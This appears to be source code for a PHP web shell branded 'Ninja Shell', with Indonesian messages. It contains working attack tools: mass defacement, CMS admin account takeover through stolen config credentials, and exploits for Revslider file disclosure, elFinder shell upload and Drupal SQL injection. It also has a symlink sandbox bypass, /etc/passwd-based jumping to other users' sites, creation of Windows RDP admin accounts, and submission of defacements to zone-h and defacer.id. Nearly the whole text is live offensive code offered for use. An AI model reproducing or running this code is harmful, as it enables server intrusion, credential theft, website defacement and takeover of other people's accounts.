"; } function ListFiles($dirrall) { if ($dh = opendir($dirrall)) { $files = array(); $inner_files = array(); $me = str_replace(dirname(__FILE__) . '/', '', __FILE__); $notallow = array($me, ".htaccess", "error_log", "_vti_inf.html", "_private", "_vti_bin", "_vti_cnf", "_vti_log", "_vti_pvt", "_vti_txt", "cgi-bin", ".contactemail", ".cpanel", ".fantasticodata", ".htpasswds", ".lastlogin", "access-logs", "cpbackup-exclude-used-by-backup.conf", ".cgi_auth", ".disk_usage", ".statspwd", "Thumbs.db"); while ($file = readdir($dh)) { if ($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow)) { if (is_dir($dirrall . "/" . $file)) { $inner_files = ListFiles($dirrall . "/" . $file); if (is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dirrall . "/" . $file); } } } closedir($dh); return $files; } } function gass_all() { global $index; $dirrall = $_POST['d_dir']; foreach (ListFiles($dirrall) as $key => $file) { $file = str_replace('//', "/", $file); echo "$file ===>"; edit_file($file, $index); flush(); } $key = $key + 1; echo "

$key Kali Anda Telah Ngecrot Disini

"; } function sabun_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc . '/' . $namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc, $namafile, $isi_script); } } } } } } if ($_POST['mass'] == 'onedir') { echo "
Versi Text Area

Versi Text

\n"; $mainpath = $_POST[d_dir]; $file = $_POST[d_file]; $dir = opendir("$mainpath"); $code = base64_encode($_POST[script]); $indx = base64_decode($code); while ($row = readdir($dir)) { $start = @fopen("$row/$file", "w+"); $finish = @fwrite($start, $indx); if ($finish) { echo 'http://' . $row . '/' . $file . '
'; } } echo "

"; } elseif ($_POST['mass'] == 'sabunkabeh') { gass(); } elseif ($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); } elseif ($_POST['mass'] == 'sabunmematikan') { gass_all(); } elseif ($_POST['mass'] == 'massdeface') { echo "

"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "

"; } else { echo "

Mass Deface / Delete Files Ninja Shell

Select Type:

Folder:

Filename:

Index File:

"; } } elseif (isset($_GET[hex('mass_user')])) { if ($_POST['hajar']) { if (strlen($_POST['pass_baru']) < 6 or strlen($_POST['user_baru']) < 6) { print "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; if (preg_match("/^http:\/\//", $conf) or preg_match("/^https:\/\//", $conf)) { $get = curl($conf); preg_match_all('//', $get, $link); foreach ($link[1] as $link_config) { $scan_conf[] = "$link_config.txt"; } } else { $scan_conf = scandir($conf); } foreach ($scan_conf as $file_conf) { $config = file_get_contents("$conf/$file_conf"); if (preg_match("/JConfig|joomla/", $config)) { $dbhost = getValue($config, "host = '", "'"); $dbuser = getValue($config, "user = '", "'"); $dbpass = getValue($config, "password = '", "'"); $dbname = getValue($config, "db = '", "'"); $dbprefix = getValue($config, "dbprefix = '", "'"); $prefix = $dbprefix . "users"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = getValue($config, "sitename = '", "'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); print "Config => " . $file_conf . "
"; print "CMS => Joomla
"; if ($site == '') { print "Sitename => " . color(1, 1, "Can't get domain name") . "
"; } else { print "Sitename => $site
"; } if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "

"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "

"; } mysql_close($conn); } elseif (preg_match("/WordPress/", $config)) { $dbhost = getValue($config, "DB_HOST', '", "'"); $dbuser = getValue($config, "DB_USER', '", "'");$dbpass = getValue($config, "DB_PASSWORD', '", "'"); $dbname = getValue($config, "DB_NAME', '", "'"); $dbprefix = getValue($config, "table_prefix = '", "'"); $prefix = $dbprefix . "users"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if ($target == '') { $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); print "Config => " . $file_conf . "
"; print "CMS => Wordpress
"; print $url_target; if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "

"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "

"; } mysql_close($conn); } elseif (preg_match("/Magento|Mage_Core/", $config)) { $dbhost = getValue($config, ""); $dbuser = getValue($config, ""); $dbpass = getValue($config, ""); $dbname = getValue($config, ""); $dbprefix = getValue($config, ""); $prefix = $dbprefix . "admin_user"; $option = $dbprefix . "core_config_data"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if ($target == '') { $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); print "Config => " . $file_conf . "
"; print "CMS => Magento
"; print $url_target; if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "

"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "

"; } mysql_close($conn); } elseif (preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $config)) { $dbhost = getValue($config, "'DB_HOSTNAME', '", "'"); $dbuser = getValue($config, "'DB_USERNAME', '", "'"); $dbpass = getValue($config, "'DB_PASSWORD', '", "'"); $dbname = getValue($config, "'DB_DATABASE', '", "'"); $dbprefix = getValue($config, "'DB_PREFIX', '", "'"); $prefix = $dbprefix . "user"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = getValue($config, "HTTP_SERVER', '", "'"); if ($target == '') { $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); print "Config => " . $file_conf . "
"; print "CMS => OpenCart
"; print $url_target; if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "

"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "

"; } mysql_close($conn); } elseif (preg_match("/panggil fungsi validasi xss dan injection/", $config)) { $dbhost = getValue($config, 'server = "', '"'); $dbuser = getValue($config, 'username = "', '"'); $dbpass = getValue($config, 'password = "', '"'); $dbname = getValue($config, 'database = "', '"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if ($target == '') { $target2 = $result[url]; $url_target = "Login => " . color(1, 1, "Cant't get domain name") . "
"; if ($target2 == '') { $url_target2 = "Login => " . color(1, 1, "Cant't get domain name") . "
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if (preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif (preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); print "Config => " . $file_conf . "
"; print "CMS => Lokomedia
"; if (preg_match("/Can't get domain name/", $url_target)) { print $url_target2; } else { print $url_target; } if (!$update or !$conn or !$db) { print "Status => " . color(1, 1, mysql_error()) . "

"; } else { print "Status => " . color(1, 2, "sukses edit user, silakan login dengan user & pass yang baru.") . "

"; } mysql_close($conn); } } } } else { print "

Mass User Changer Ninja Shell

"; } } elseif (isset($_GET[hex('mass_title')])) { echo "

Mass Title Changer Ninja Shell

"; if ($_POST['gass']) { echo " "; } if ($_POST['edittitle']) { $title = htmlspecialchars($_POST['title']); $id = $_POST['id']; $content = $_POST['content']; $postname = $_POST['name']; function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\r\n", $_POST['link']); foreach ($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config, "DB_HOST', '", "'"); $dbuser = ambilkata($config, "DB_USER', '", "'"); $dbpass = ambilkata($config, "DB_PASSWORD', '", "'"); $dbname = ambilkata($config, "DB_NAME', '", "'"); $dbprefix = ambilkata($config, "table_prefix = '", "'"); $prefix = $dbprefix . "posts"; $option = $dbprefix . "options"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$content',post_name='$postname',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "

"; if ($target == '') { echo "URL: error, gabisa ambil nama domain nya -> "; } else { echo "URL: $target/?p=$id -> "; } if (!$update or !$conn or !$db) { echo "MySQL Error: " . mysql_error() . "
"; } else { echo "sukses di ganti.
"; } echo "

"; mysql_close($conn); } } } elseif (isset($_GET[hex('bypass')])) { echo "

"; echo "

Bypasser Ninja Shell

"; echo ""; echo "

"; } elseif (isset($_GET[hex('bypass-cf')])) { echo ' '; $target = $_POST['target']; # Bypass From FTP if ($_POST['krz'] == "ftp") { $ftp = gethostbyname("ftp." . "$target"); echo "

Correct ip is : $ftp

"; } # Bypass From Direct-Connect if ($_POST['krz'] == "direct-conntect") { $direct = gethostbyname("direct-connect." . "$target"); echo "

Correct ip is : $direct

"; } # Bypass From Webmail if ($_POST['krz'] == "webmail") { $web = gethostbyname("webmail." . "$target"); echo "

Correct ip is : $web

"; } # Bypass From Cpanel if ($_POST['krz'] == "cpanel") { $cpanel = gethostbyname("cpanel." . "$target"); echo "

Correct ip is : $cpanel

"; } } elseif (isset($_GET[hex('bypass-server')])) { $dir = path(); ?>

Bypass Server Ninja Shell

"; echo "
Bypass Symlink vHost

"; echo ""; if (isset($_POST['Colii'])) { system('ln -s / Exorcism1337.txt'); $fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw'; $file = fopen(".htaccess", "w+"); $write = fwrite($file, base64_decode($fvckem)); $Bok3p = symlink("/", "Exorcism1337.txt"); $rt = "
Bypassed Successfully"; echo "

Done.. !

Check link given below for / folder symlink
$rt"; } echo "

"; } elseif (isset($_GET[hex('bypass-passwd')])) { echo '

Bypass Etc/Passwd

Bypass User

'; if ($_POST['awkuser']) { echo "
"; } if ($_POST['systuser']) { echo "
"; } if ($_POST['passthuser']) { echo "
"; } if ($_POST['exuser']) { echo "
"; } if ($_POST['shexuser']) { echo "
"; } if ($_POST['syst']) { echo "

"; } if ($_POST['passth']) { echo "

"; } if ($_POST['ex']) { echo "

"; } if ($_POST['shex']) { echo "

"; } echo ''; if ($_POST['melex']) { echo "

"; } } elseif (isset($_GET[hex('exploiter')])) { echo "

"; echo "

Exploiter Ninja Shell

"; echo ""; echo "

"; } elseif (isset($_GET[hex('csrf')])) { echo '

CSRF Exploiter Ninja Shell

*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc

'; $url = $_POST["url"]; $pf = $_POST["pf"]; $d = $_POST["d"]; if ($d) { echo "

Upload Your Files

"; } } elseif (isset($_GET[hex('revslider')])) { echo "

Revslider Exploiter Ninja Shell

"; function findit($mytext, $starttag, $endtag) { $posLeft = stripos($mytext, $starttag) + strlen($starttag); $posRight = stripos($mytext, $endtag, $posLeft + 1); return substr($mytext, $posLeft, $posRight - $posLeft); } error_reporting(0); set_time_limit(0); $ya = $_POST['sikat']; $co = $_POST['site']; if ($ya) { $e = explode(" ", $co); foreach ($e as $bda) { //echo '
'.$bda; $linkof = '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'; $dn = ($bda) . ($linkof); $file = @file_get_contents($dn); if (eregi('DB_HOST', $file) and !eregi('FTP_USER', $file)) { echo '----------------------------------------------'; echo "" . $bda . ""; echo "DB name : " . findit($file, "DB_NAME', '", "');") . "
"; echo "DB user : " . findit($file, "DB_USER', '", "');") . "
"; echo "DB pass : " . findit($file, "DB_PASSWORD', '", "');") . "
"; echo "DB host : " . findit($file, "DB_HOST', '", "');") . "
"; } elseif (eregi('DB_HOST', $file) and eregi('FTP_USER', $file)) { echo '----------------------------------------------'; echo "" . $bda . ""; echo "FTP user : " . findit($file, "FTP_USER','", "');") . "
"; echo "FTP pass : " . findit($file, "FTP_PASS','", "');") . "
"; echo "FTP host : " . findit($file, "FTP_HOST','", "');") . "
"; } else { echo "" . $bda . " ----> not infected "; } echo '----------------------------------------------'; } } } elseif (isset($_GET[hex('elfinder')])) { echo "

"; echo ""; echo '

ElFinder Mass Exploiter

'; echo '

'; function ngirim($url, $isi) { $ch = curl_init("$url"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $isi); curl_setopt($ch, CURLOPT_COOKIEJAR, 'coker_log'); curl_setopt($ch, CURLOPT_COOKIEFILE, 'coker_log'); $data3 = curl_exec($ch); return $data3; } $target = explode(" ", $_POST['target']); if ($_POST['x']) { foreach ($target as $korban) { $nama_doang = "Exorcism1337.php"; $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1 lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV 0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg=="; $decode_isi = base64_decode($isi_nama_doang); $encode = base64_encode($nama_doang); $fp = fopen($nama_doang, "w"); fputs($fp, $decode_isi); echo "[!] $korban
"; echo "# Upload[1] ......
"; $url_mkfile = "$korban?cmd=mkfile&name=$nama_doang&target=l1_Lw"; $b = file_get_contents("$url_mkfile"); $post1 = array("cmd" => "put", "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array("current" => "8ea8853cb93f2f9781e0bf6e857015ea", "upload[]" => "@$nama_doang",); $output_mkfile = ngirim("$korban", $post1); if (preg_match("/$nama_doang/", $output_mkfile)) { echo "# Upload Sukses 1... => $nama_doang
# Coba buka di ../../elfinder/files/...

"; } else { echo "# Upload Gagal Cok! 1
# Uploading 2..
"; $upload_ah = ngirim("$korban?cmd=upload", $post2); if (preg_match("/$nama_doang/", $upload_ah)) { echo "# Upload Sukses 2 => $nama_doang
# Coba buka di ../../elfinder/files/...

"; } else { echo "# Upload Gagal Lagi Cok! 2

"; } } } } } elseif (isset($_GET[hex('drupal')])) { echo "

"; echo "

Drupal Mass Exploiter

"; $drupal = ($_GET["drupal"]); if ($drupal == 'drupal') { $filename = $_FILES['file']['name']; $filetmp = $_FILES['file']['tmp_name']; echo "

"; move_uploaded_file($filetmp, $filename); } error_reporting(0); if (isset($_POST['submit'])) { function exploit($url) { $post_data = "name[0;update users set name %3D 'Exorcism' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded ", 'content' => $post_data)); $ctx = stream_context_create($params); $data = file_get_contents($url . '/user/login/', null, $ctx); if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) { $fp = fopen("exploited.txt", 'a+'); fwrite($fp, "Exploitied User: Exorcism Pass: Exorcism =====> {$url}/user/login"); fwrite($fp, " "); fwrite($fp, "--------------------------------------------------------------------------------------------------"); fwrite($fp, " "); fclose($fp); echo "Success:Exorcism Pass:Exorcism => {$url}/user/login
"; } else { echo "Failed => {$url}/user/login
"; } } $urls = explode(" ", $_POST['url']); foreach ($urls as $url) { $url = @trim($url); echo exploit($url); } } } elseif (isset($_GET[hex('auto_tools')])) { echo '

Auto Tools Ninja Shell

Zone H	Defacer ID	Jumping	Fake Root	Adminer
Wp Auto Hijack	Cpanel Reset	Zip Menu	Reverse IP	K-RDP Shell
Ransomware	WhoIs	Php Info	Inject Code	DB Dump
Cpanel Crack	SMTP Grabber	Domains Viewer	WHMCS Decoder	Delete Logs

'; } elseif (isset($_GET[hex('zone-h')])) { ?>

Zone H Submit Ninja Shell

Defacer :
Attacks Method :
Reasons :

(1 Domain Per Lines)

Defacer ID Submit Ninja Shell

"; $site = explode("\r\n", $_POST['sites']); $go = $_POST['go']; $hekel = $_POST['hekel']; $tim = $_POST['tim']; if ($go) { foreach ($site as $sites) { $zh = $sites; $form_url = "https://www.defacer.id/notify"; $data_to_post = array(); $data_to_post['attacker'] = "$hekel"; $data_to_post['team'] = "$tim"; $data_to_post['poc'] = 'SQL Injection'; $data_to_post['url'] = "$zh"; $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $form_url); curl_setopt($curl, CURLOPT_POST, sizeof($data_to_post)); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm) curl_setopt($curl, CURLOPT_POSTFIELDS, $data_to_post); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html'); $result = curl_exec($curl); echo $result; curl_close($curl); echo "
"; } } } elseif (isset($_GET[hex('jumping')])) { echo "

Jumping Ninja Shell

"; echo ""; if (isset($_POST['jump'])) { $i = 0; echo "

";
				$etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd");
				while ($passwd = fgets($etc)) {
					if ($passwd == '' || !$etc) {
						echo "Can't read /etc/passwd";
					} else {
						preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
						foreach ($user_jumping[1] as $user_Exc_jump) {
							$user_jumping_dir = "/home/$user_Exc_jump/public_html";
							if (is_readable($user_jumping_dir)) {
								$i++;
								$jrw = "[R] $user_jumping_dir";
								if (is_writable($user_jumping_dir)) {
									$jrw = "[RW] $user_jumping_dir";
								}
								echo $jrw;
								if (function_exists('posix_getpwuid')) {
									$domain_jump = file_get_contents("/etc/named.conf");
									if ($domain_jump == '') {
										echo " => ( gabisa ambil nama domain nya )
";
									} else {
										preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
										foreach ($domains_jump[1] as $dj) {
											$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
											$user_jumping_url = $user_jumping_url['name'];
											if ($user_jumping_url == $user_Exc_jump) {
												echo " => ( $dj )
";
												break;
											}
										}
									}
								} else {
									echo "
";
								}
							}
						}
					}
				}
				if ($i == 0) {
				} else {
					echo "
Total ada " . $i . " Kamar di " . gethostbyname($_SERVER['HTTP_HOST']) . "";
				}
				echo "

"; } } elseif (isset($_GET[hex('fake-root')])) { ob_start(); if (!preg_match("#/home/$user/public_html#", $_SERVER['DOCUMENT_ROOT'])) die("I Think this server is not using shared host "); function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[", "", str_replace("]", "", str_replace("\"\"", "", str_replace(", ,", ",", str_replace("{", "", str_replace("{", "", str_replace("}", "", str_replace(", ", ",", str_replace(", ", ",", str_replace("'", "", str_replace("'", "", str_replace(":", ",", str_replace('"', '', $resp))))))))))))); $array = explode(",,", $resp); unset($array[0]); foreach ($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk . "\n"; ob_flush(); flush(); } curl_close($ch); } function cek($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $resp = curl_exec($ch); return $resp; } $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if ($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach ($site as $url) { $cek = cek("$url/~$user/$file"); if (preg_match("/hacked/i", $cek)) { echo "URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "

Fake Root Ninja Shell

Filename:

User:

Domain:

NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.

"; } } elseif (isset($_GET[hex('adminer')])) { echo "

"; echo "

Adminer Ninja Shell

"; echo ""; echo "

"; if (isset($_POST['do_adminer'])) { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists('adminer.php')) { echo "-> adminer login <-"; } else { if (adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php", "adminer.php")) { echo "-> adminer login <-"; } else { echo "gagal buat file adminer"; } } } } elseif (isset($_GET[hex('rdp')])) { if (strtolower(substr(PHP_OS, 0, 3)) === 'win') { if ($_POST['create']) { $user = htmlspecialchars($_POST['user']); $pass = htmlspecialchars($_POST['pass']); if (preg_match("/$user/", exe("net user"))) { echo "[INFO] -> user $user sudah ada"; } else { $add_user = exe("net user $user $pass /add"); $add_groups1 = exe("net localgroup Administrators $user /add"); $add_groups2 = exe("net localgroup Administrator $user /add"); $add_groups3 = exe("net localgroup Administrateur $user /add"); echo "[ RDP ACCOUNT INFO ]
------------------------------
IP: " . gethostbyname($_SERVER['HTTP_HOST']) . "
Username: $user
Password: $pass
------------------------------

[ STATUS ]
------------------------------
"; if ($add_user) { echo "[add user] -> Berhasil
"; } else { echo "[add user] -> Gagal
"; } if ($add_groups1) { echo "[add localgroup Administrators] -> Berhasil
"; } elseif ($add_groups2) { echo "[add localgroup Administrator] -> Berhasil
"; } elseif ($add_groups3) { echo "[add localgroup Administrateur] -> Berhasil
"; } else { echo "[add localgroup]-> Gagal
"; } echo "------------------------------
"; } } elseif ($_POST['s_opsi']) { $user = htmlspecialchars($_POST['r_user']); if ($_POST['opsi'] == '1') { $cek = exe("net user $user"); echo "Checking username $user ....... "; if (preg_match("/$user/", $cek)) { echo "[ Sudah ada ]
------------------------------

$cek

"; } else { echo "[ belum ada ]"; } } elseif ($_POST['opsi'] == '2') { $cek = exe("net user $user Exorcism1337"); if (preg_match("/$user/", exe("net user"))) { echo "[change password: Exorcism1337] -> "; if ($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } elseif ($_POST['opsi'] == '3') { $cek = exe("net user $user /DELETE"); if (preg_match("/$user/", exe("net user"))) { echo "[remove user: $user] -> "; if ($cek) { echo "Berhasil"; } else { echo "Gagal"; } } else { echo "[INFO] -> user $user belum ada"; } } else { // } } else { echo "

"; echo "

RDP Ninja Shell

"; echo "-- Create RDP --

-- Option --

"; } } else { echo "Fitur ini hanya dapat digunakan dalam Windows Server."; } } elseif (isset($_GET[hex('wp-hijack')])) { echo '

'; $pghost = $_POST['pghost']; $dbnmn = $_POST['dbnmn']; $dbusrrrr = $_POST['dbusrrrr']; $pwddbbn = $_POST['pwddbbn']; $index = stripslashes($_POST['pown']); $prefix = $_POST['prefix']; //$prefix = "wp_"; if ($_POST['up2']) { @mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error()); @mysql_select_db($dbnmn) or die(mysql_error()); $tableName = $prefix . "posts"; $ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 "); if (!$ghost1) { $ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 "); } elseif (!$ghost2) { $ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 "); } mysql_close(); if ($ghost1 || $ghost2 || $ghost3) { echo "

Index Website Have been Hijacked Successfully

"; } else { echo "

Failed To Hijack the Website :(

"; } } } elseif (isset($_GET[hex('cpanel-reset')])) { echo '

Cpanel Reset Ninja Shell

Email :

'; $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); if (isset($_POST['submit'])) { $email = $_POST['email']; $wr = 'email:' . $email; $f = fopen('/home/' . $user . '/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/' . $user . '/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); $parm = "Disini : " . $site . ':2083/resetpass?start=1'; echo '
' . $parm . ''; }; } elseif (isset($_GET[hex('zip-menu')])) { $dir = path(); echo ""; echo "

"; echo "

Zip Menu

